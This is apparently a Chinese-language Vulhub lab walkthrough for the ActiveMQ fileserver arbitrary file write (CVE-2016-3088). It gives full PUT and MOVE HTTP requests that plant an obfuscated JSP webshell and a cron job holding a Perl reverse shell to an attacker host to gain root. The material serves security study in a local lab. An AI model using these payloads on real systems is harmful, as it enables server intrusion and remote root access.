Vluhub漏洞之 ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)

Vluhub漏洞之 ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)

一、搭建环境

如何搭建vulhub，附上链接。
启动靶场环境

cd vulhub/activemq/CVE-2016-3088/
docker-compose up -d

环境监听端口 61616 和端口 8161，其中 8161 为 web 控制台端口。此漏洞出现在 Web 控制台中。

访问http://your-ip:8161/看到网页，说明环境已经成功运行。

二、背景简介

ActiveMQ web控制台分为三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是存储文件的接口；admin和api需要登录才能使用，fileserver不需要登录。

fileserver 是一个 RESTful API 接口。我们可以通过 GET、PUT 和 DELETE 等 HTTP 请求读取和写入其中存储的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件的缺陷，但后来发现：

1. 它的使用率不高
2. 文件操作容易出现漏洞

因此，ActiveMQ 在 5.12.x~5.13.x 中默认关闭了 fileserver 应用程序（可以在 conf/jetty.xml 中打开）；在 5.14.0 之后，文件服务器应用程序被完全删除。

三、漏洞详情

这个漏洞出现在Fileserver应用中，漏洞原理其实很简单，就是fileserver支持写入文件（但不解析JSP），同时支持移动文件（MOVE请求）。因此，我们只需要写入一个文件，然后通过移动请求将其移动到任意位置，从而导致任意文件写入漏洞。

写入文件，例如 cron 或 ssh key

1. 编写 Webshel​​l
2. 写入文件，例如 cron 或 ssh key
3. 编写jar或jetty.xml等库和配置文件

写webshel​​l的好处是方便，但是fileserver不解析jsp，admin和api都需要登录才能访问，有点徒劳；写cron或者ssh key的好处是直接反Shell，也方便，缺点是需要root权限；写jar，有点麻烦（需要jar后门），写xml配置文件，这种方式比较靠谱，但是有一点没用：我们需要知道ActiveMQ的绝对路径。

四、利用

默认的 ActiveMQ 帐户和密码是admin. 首先访问http://yourip:8161/admin/test/systemProperties.jsp查看ActiveMQ的绝对路径：

然后通过burpsuite上传webshell，之后可以通过蚁剑等工具进行连接。

PUT /fileserver/abc.txt HTTP/1.1
Host: http://192.168.116.129:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 780



<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
 
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>

状态码204表示成功，之后将文件转至/opt/activemq/webapps/api/s.jspWeb 目录中的 API 文件夹 ( )：

MOVE /fileserver/abc.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/admin/abc.jsp
Host: http://192.168.116.129:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

成功。
蚁剑的配置，记得要在请求信息里添加一个Authorization


成功拿下

编写crontab，反弹shell

这是一种比较稳定的方法。首先上传cron配置文件（注意换行必须是\n，不是\r\n，否则crontab执行会失败）：

PUT /fileserver/1.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 248

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.244.129";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

将其移至/etc/cron.d/root：

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

攻击方主机先监听21端口：

如果以上两个请求都返回204，则写入成功。等待反向shell：

成功反弹shell，拿到root权限
此方法要求 ActiveMQ 以 root 身份运行，否则将无法写入 cron 文件。